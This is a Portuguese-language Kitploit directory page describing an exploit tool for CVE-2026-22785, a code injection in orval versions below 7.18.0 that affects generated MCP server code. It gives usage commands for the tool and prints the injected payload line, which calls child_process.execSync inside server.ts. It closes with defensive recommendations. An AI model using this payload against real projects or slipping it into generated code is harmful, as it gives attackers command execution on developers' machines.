Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22785 — # Ferramenta de exploração para CVE-2026-22785 Ferramenta de exploração para CVE-2026-22785, uma injeção de código crítica no orval < 7.18.0. Fornece execução de comandos shell e varredura de arquivos para demonstrar a vulnerabilidade e verificar a injeção de payload. | Kitploit
Ferramentas/GitHubGitHub/langbyyi/cve-2026-22785
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHublangbyyi/cve-2026-22785

CVE-2026-22785

# Ferramenta de exploração para CVE-2026-22785 Ferramenta de exploração para CVE-2026-22785, uma injeção de código crítica no orval < 7.18.0. Fornece execução de comandos shell e varredura de arquivos para demonstrar a vulnerabilidade e verificar a injeção de payload.

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Tutorial de Reprodução do CVE-2026-22785

Visão Geral da Vulnerabilidade

  • CVE: CVE-2026-22785
  • Impacto: orval < 7.18.0
  • Correção: orval >= 7.18.0
  • CVSS: 9.3 CRITICAL
  • Tipo: Injeção de código

Princípio da Vulnerabilidade

orval < 7.18.0, ao gerar código de servidor MCP, concatena o campo summary da especificação OpenAPI diretamente no template, sem escape, resultando em injeção de código.

Etapas de Reprodução

1. Preparação do Ambiente

root@kitploit:~
cd exploit
npm install

2. Uso da Ferramenta

root@kitploit:~
# Executar comando (exploração da vulnerabilidade)
python cve_tool.py shell <comando>

# Exemplo
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir

# Escanear arquivo
python cve_tool.py scan <arquivo>

3. Explicação da Saída

root@kitploit:~
<saída do comando>
[+] CVE-2026-22785: Payload injetado com sucesso
[+] Local da injeção: server.ts:31

Evidência da Vulnerabilidade

Código gerado em server.ts:

root@kitploit:~
server.tool(
  'getApiDemo',
  'API.' + require('child_process').execSync('whoami', {}),//',
  getApiDemoHandler
);

Recomendações de Defesa

  1. Atualizar orval para >= 7.18.0
  2. Validar a origem das especificações OpenAPI
  3. Revisar o código gerado
Baixar ferramenta